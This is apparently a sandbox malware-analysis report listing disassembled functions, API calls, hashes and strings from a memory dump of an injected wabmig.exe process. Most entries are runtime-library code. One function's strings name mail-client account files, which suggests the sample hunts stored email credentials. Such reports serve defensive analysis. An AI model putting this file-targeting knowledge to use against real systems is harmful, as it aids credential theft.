                                                                            • _ValidateLocalCookies.LIBCMT ref: 23233431
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 2323345C
                                                                            • _ValidateLocalCookies.LIBCMT ref: 232334B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: 14ad29a9642afbd03331447ffd6270d4c3125e00e915ae49845bc09d8dc7c235
                                                                            • Instruction ID: 35ca6adbcb076da82ae2eee62529fcac9b94f33391a2946efb0b5189a8b2b1a8
                                                                            • Opcode Fuzzy Hash: 14ad29a9642afbd03331447ffd6270d4c3125e00e915ae49845bc09d8dc7c235
                                                                            • Instruction Fuzzy Hash: C34123B4E002099BCB10DF28CD80A8EBBB5AF86324F18C1D5EB149B251C775EB91CB91
                                                                            Function 2323925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 23239221: _free.LIBCMT ref: 2323924A
                                                                            • _free.LIBCMT ref: 232392AB
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 232392B6
                                                                            • _free.LIBCMT ref: 232392C1
                                                                            • _free.LIBCMT ref: 23239315
                                                                            • _free.LIBCMT ref: 23239320
                                                                            • _free.LIBCMT ref: 2323932B
                                                                            • _free.LIBCMT ref: 23239336
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                            • Instruction ID: c33ba18601f456365366d09e62547fb4a483682282e6638b9914bd978430d9f2
                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                            • Instruction Fuzzy Hash: 4A11B1B1564B08FAD6B0ABB0CC45FCB7BAD9F13300F400864AADD76052DAB4F5804741
                                                                            Function 23238821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 488 23238821-2323883a 489 23238850-23238855 488->489 490 2323883c-2323884c call 23239341 488->490 492 23238862-23238886 MultiByteToWideChar 489->492 493 23238857-2323885f 489->493 490->489 497 2323884e 490->497 495 23238a19-23238a2c call 23232ada 492->495 496 2323888c-23238898 492->496 493->492 498 2323889a-232388ab 496->498 499 232388ec 496->499 497->489 502 232388ca-232388db call 232356d0 498->502 503 232388ad-232388bc call 2323bf20 498->503 501 232388ee-232388f0 499->501 506 232388f6-23238909 MultiByteToWideChar 501->506 507 23238a0e 501->507 502->507 513 232388e1 502->513 503->507 516 232388c2-232388c8 503->516 506->507 510 2323890f-2323892a call 23235f19 506->510 511 23238a10-23238a17 call 23238801 507->511 510->507 520 23238930-23238937 510->520 511->495 517 232388e7-232388ea 513->517 516->517 517->501 521 23238971-2323897d 520->521 522 23238939-2323893e 520->522 523 232389c9 521->523 524 2323897f-23238990 521->524 522->511 525 23238944-23238946 522->525 528 232389cb-232389cd 523->528 526 23238992-232389a1 call 2323bf20 524->526 527 232389ab-232389bc call 232356d0 524->527 525->507 529 2323894c-23238966 call 23235f19 525->529 532 23238a07-23238a0d call 23238801 526->532 542 232389a3-232389a9 526->542 527->532 544 232389be 527->544 528->532 533 232389cf-232389e8 call 23235f19 528->533 529->511 541 2323896c 529->541 532->507 533->532 545 232389ea-232389f1 533->545 541->507 546 232389c4-232389c7 542->546 544->546 547 232389f3-232389f4 545->547 548 23238a2d-23238a33 545->548 546->528 549 232389f5-23238a05 WideCharToMultiByte 547->549 548->549 549->532 550 23238a35-23238a3c call 23238801 549->550 550->511
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23236FFD,00000000,?,?,?,23238A72,?,?,00000100), ref: 2323887B
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23238A72,?,?,00000100,5EFC4D8B,?,?), ref: 23238901
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 232389FB
                                                                            • __freea.LIBCMT ref: 23238A08
                                                                              • Part of subcall function 232356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23235702
                                                                            • __freea.LIBCMT ref: 23238A11
                                                                            • __freea.LIBCMT ref: 23238A36
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1414292761-0
                                                                            • Opcode ID: 61bcc2e243c32604999830909a88f68eeab6776b8e9375cae1aff149df58f6db
                                                                            • Instruction ID: ab52bd813a98aa723fd0db42631079af2b11b9f1571c367c173f1b59b87e7fff
                                                                            • Opcode Fuzzy Hash: 61bcc2e243c32604999830909a88f68eeab6776b8e9375cae1aff149df58f6db
                                                                            • Instruction Fuzzy Hash: E45105F261020BAFDB259E60CC80EAB37A9EF56750F1446A9FD04DE140EB74ECD8C690
                                                                            Function 232315DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 23231607
                                                                            • _strcat.LIBCMT ref: 2323161D
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2323190E,?,?,00000000,?,00000000), ref: 23231643
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,2323190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2323165A
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,2323190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23231661
                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2323190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23231686
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                            • String ID:
                                                                            • API String ID: 1922816806-0
                                                                            • Opcode ID: d6272f39e96a8e277e413205fad5e798a8b807fc08146ab1e208b6fa7e386cb7
                                                                            • Instruction ID: 59154ae6aa7fb697e529c77cb0fc3b487a18027fc2a96bac40dbd9f6d5a10471
                                                                            • Opcode Fuzzy Hash: d6272f39e96a8e277e413205fad5e798a8b807fc08146ab1e208b6fa7e386cb7
                                                                            • Instruction Fuzzy Hash: 9B213A72A00304ABC714EB64DC84EEE77B8EF89710F1480ABE604EB140DB74B58287A5
                                                                            Function 23231000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 23231038
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2323104B
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23231061
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23231075
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23231090
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 232310B8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                            • String ID:
                                                                            • API String ID: 3594823470-0
                                                                            • Opcode ID: 0dfba8d3870f82e38a3beb8ad8929b1d9b87167a1b5d079e3be87c725702d177
                                                                            • Instruction ID: bf9cc7ce3237399518f21b02f8666020e9ae3c658506145b1076810876a24aea
                                                                            • Opcode Fuzzy Hash: 0dfba8d3870f82e38a3beb8ad8929b1d9b87167a1b5d079e3be87c725702d177
                                                                            • Instruction Fuzzy Hash: C421A1B59003299BCF20FB61DC48EDB376CEF45714F104296E969931A1DA70AAC6CB90
                                                                            Function 23233856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,23233518,232323F1,23231F17), ref: 23233864
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23233872
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2323388B
                                                                            • SetLastError.KERNEL32(00000000,?,23233518,232323F1,23231F17), ref: 232338DD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 3f842a334aab6af30223e2991f64862de67aea27741588a299166c8246dfb578
                                                                            • Instruction ID: 4c21a6ef885f12d8ce1bd60ccf562dee9e7a6237f35da2b3dd68f4b68598c799
                                                                            • Opcode Fuzzy Hash: 3f842a334aab6af30223e2991f64862de67aea27741588a299166c8246dfb578
                                                                            • Instruction Fuzzy Hash: 800147F26097125EE2103A797E8C9562BA9EFE777072043BAF310980E1EF65DED08304
                                                                            Function 23235AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,23236C6C), ref: 23235AFA
                                                                            • _free.LIBCMT ref: 23235B2D
                                                                            • _free.LIBCMT ref: 23235B55
                                                                            • SetLastError.KERNEL32(00000000,?,?,23236C6C), ref: 23235B62
                                                                            • SetLastError.KERNEL32(00000000,?,?,23236C6C), ref: 23235B6E
                                                                            • _abort.LIBCMT ref: 23235B74
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            • Opcode ID: 006aec8d7dae5cd789a04c8779afa515c836a6b3b7707cee181758b1b33cd73b
                                                                            • Instruction ID: 688908a6f9ac6055b0964229afb68fb0c39fcb39c97ac8498f788665fe636d95
                                                                            • Opcode Fuzzy Hash: 006aec8d7dae5cd789a04c8779afa515c836a6b3b7707cee181758b1b33cd73b
                                                                            • Instruction Fuzzy Hash: 6EF0C8F2614701AAC31236346C48E4E266F8FF3A71B3941E5FA1CA7185FE78D5C34168
                                                                            Function 232311EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,?,?,?,232310DF,?,?,?,00000000), ref: 23231E9A
                                                                              • Part of subcall function 23231E89: lstrcatW.KERNEL32(?,?,?,232310DF,?,?,?,00000000), ref: 23231EAC
                                                                              • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EB3
                                                                              • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EC8
                                                                              • Part of subcall function 23231E89: lstrcatW.KERNEL32(?,232310DF,?,232310DF,?,?,?,00000000), ref: 23231ED3
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2323122A
                                                                              • Part of subcall function 2323173A: _strlen.LIBCMT ref: 23231855
                                                                              • Part of subcall function 2323173A: _strlen.LIBCMT ref: 23231869
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                            • API String ID: 4036392271-1520055953
                                                                            • Opcode ID: 8cff83d4d68d9c22b77f6567653fa8351a21fa046d027ecd2f46575f75f2244a
                                                                            • Instruction ID: b7ee1e44fcd91867b232bcd558e41b588cb569ebd627cb07d1956ab8cecb28a7
                                                                            • Opcode Fuzzy Hash: 8cff83d4d68d9c22b77f6567653fa8351a21fa046d027ecd2f46575f75f2244a
                                                                            • Instruction Fuzzy Hash: 8221D7B9E503286AE724A790DC81FED7339EF50B14F000586F604EB1D0E6B17DC18759
                                                                            Function 23234B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23234AEA,?,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000), ref: 23234B59
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23234B6C
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,23234AEA,?,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000,00000001,23232082), ref: 23234B8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: a9d9bc6792c8510978a7806f4d9d8e49fe1132b64e638c16ca59321586fa9866
                                                                            • Instruction ID: 03df5ccaeff47b9ef8ac61e131930e5ce7702a01d457e56bdc623e1a760aa835
                                                                            • Opcode Fuzzy Hash: a9d9bc6792c8510978a7806f4d9d8e49fe1132b64e638c16ca59321586fa9866
                                                                            • Instruction Fuzzy Hash: D0F04F71A00208BFDB11AFA0CC0CF9DBFBAEF15751F0081E6F905A6150DB359991CA94
                                                                            Function 23237153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 2323715C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2323717F
                                                                              • Part of subcall function 232356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23235702
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 232371A5
                                                                            • _free.LIBCMT ref: 232371B8
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 232371C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            • Opcode ID: 84812df2c4dc4e140457f23ed2ecbd34c93d6a9141b181908a3173f02022cddc
                                                                            • Instruction ID: ac41cffd75e7001d593d61a911633b37ff437a731c361ae1803ee5023e5cf714
                                                                            • Opcode Fuzzy Hash: 84812df2c4dc4e140457f23ed2ecbd34c93d6a9141b181908a3173f02022cddc
                                                                            • Instruction Fuzzy Hash: E501ACF36116167FAB112ABE4C4CD7B7A6DDED3E6031441AEBD44C7204EF649C4291B4
                                                                            Function 23235B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,2323636D,23235713,00000000,?,23232249,?,?,23231D66,00000000,?,?,00000000), ref: 23235B7F
                                                                            • _free.LIBCMT ref: 23235BB4
                                                                            • _free.LIBCMT ref: 23235BDB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23235BE8
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23235BF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: b4797bc648f62f3a0448d2cf9400341a93b6fbf45840d3b385bae5a6d08d168e
                                                                            • Instruction ID: fe02031277bd3c38eeb6944ab8d8d1c6b46bdf04960d37220b28710a1d1370ae
                                                                            • Opcode Fuzzy Hash: b4797bc648f62f3a0448d2cf9400341a93b6fbf45840d3b385bae5a6d08d168e
                                                                            • Instruction Fuzzy Hash: 9B01F4F2215B02ABC31276342C88D4F2A6FDBE3A7073401E5FA1D9314AEEB8D9824164
                                                                            Function 23231E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,232310DF,?,?,?,00000000), ref: 23231E9A
                                                                            • lstrcatW.KERNEL32(?,?,?,232310DF,?,?,?,00000000), ref: 23231EAC
                                                                            • lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EB3
                                                                            • lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EC8
                                                                            • lstrcatW.KERNEL32(?,232310DF,?,232310DF,?,?,?,00000000), ref: 23231ED3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat
                                                                            • String ID:
                                                                            • API String ID: 493641738-0
                                                                            • Opcode ID: 41342a0d715e57960060ba3c5edb27bf090e2f1aa1357e3549100542b6f1c89e
                                                                            • Instruction ID: 08537054261148d16acdea9dfe2851a232a4b9033d43a782fd6908e799727c24
                                                                            • Opcode Fuzzy Hash: 41342a0d715e57960060ba3c5edb27bf090e2f1aa1357e3549100542b6f1c89e
                                                                            • Instruction Fuzzy Hash: 5EF089661012107AD6213729AC89EBF777CEFD6B60B44401AF60883190DB55685292F5
                                                                            Function 232391B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 232391D0
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 232391E2
                                                                            • _free.LIBCMT ref: 232391F4
                                                                            • _free.LIBCMT ref: 23239206
                                                                            • _free.LIBCMT ref: 23239218
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: d79033992a7fa86739f1bf01f8dffcf83b8e717e4091583928265915f4629cb8
                                                                            • Instruction ID: be93aac3aa790d4dd2da4624247debc08536451f3e314e5a2160cc302656ff9e
                                                                            • Opcode Fuzzy Hash: d79033992a7fa86739f1bf01f8dffcf83b8e717e4091583928265915f4629cb8
                                                                            • Instruction Fuzzy Hash: 2DF0AFF1524240978620FA58EFC8D067BFDEB236103240885EB89E7504CB74F8C08E54
                                                                            Function 23235351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 2323536F
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 23235381
                                                                            • _free.LIBCMT ref: 23235394
                                                                            • _free.LIBCMT ref: 232353A5
                                                                            • _free.LIBCMT ref: 232353B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 47b6da59584231fe0cdd7d82ba28d09af52e63bcc171a15fb5b41e8e7aab6ece
                                                                            • Instruction ID: ccf2d059d458139344b735159897defb32091902dc7cab1139af003665186491
                                                                            • Opcode Fuzzy Hash: 47b6da59584231fe0cdd7d82ba28d09af52e63bcc171a15fb5b41e8e7aab6ece
                                                                            • Instruction Fuzzy Hash: F6F05BB0924710DBC6157F28AE494083FB9B739B103258185FB1893254D77995A28B81
                                                                            Function 23234BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wabmig.exe,00000104), ref: 23234C1D
                                                                            • _free.LIBCMT ref: 23234CE8
                                                                            • _free.LIBCMT ref: 23234CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Program Files (x86)\windows mail\wabmig.exe
                                                                            • API String ID: 2506810119-137341269
                                                                            • Opcode ID: 286e6e8dee48d27aa1e025c3db445aad1ce39d58e181b1f14bece20279c5dd30
                                                                            • Instruction ID: e09e0dceabe8e05a19f6325eef0e3a5ca553e8582558544f9330179bbbf7de00
                                                                            • Opcode Fuzzy Hash: 286e6e8dee48d27aa1e025c3db445aad1ce39d58e181b1f14bece20279c5dd30
                                                                            • Instruction Fuzzy Hash: 2D3172B1B00319AFDB21DF99DD84D9EBBFCEB96710F1580D6EA0497200D7B59A81CB50
                                                                            Function 232386E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23236FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23238731
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 232387BA
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 232387CC
                                                                            • __freea.LIBCMT ref: 232387D5
                                                                              • Part of subcall function 232356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23235702
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
